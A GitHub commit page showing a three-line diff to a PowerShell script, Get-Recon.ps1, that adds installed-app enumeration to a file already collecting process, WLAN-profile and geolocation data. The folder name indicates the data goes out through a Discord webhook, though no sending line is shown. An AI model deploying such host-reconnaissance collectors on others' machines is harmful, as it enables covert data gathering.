Skip to content

Commit 7dd6966

Browse files
authored
Update Get-Recon.ps1
1 parent 80e55fe commit 7dd6966

File tree

1 file changed

+3
-0
lines changed

1 file changed

+3
-0
lines changed

Basic Recon with Discord Webhook/Get-Recon.ps1

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -90,6 +90,9 @@ return $WLANProfileObjects
9090

9191
"Process Information:" | Out-File -FilePath $outputFile -Append
9292
Get-Process | Out-File -FilePath $outputFile -Append
93+
94+
"App Information:" | Out-File -FilePath $outputFile -Append
95+
Get-AppxPackage | Out-File -FilePath $outputFile -Append
9396
}
9497
else {
9598
"Failed to retrieve geolocation information." | Out-File -FilePath $outputFile -Append

0 commit comments

Comments
 (0)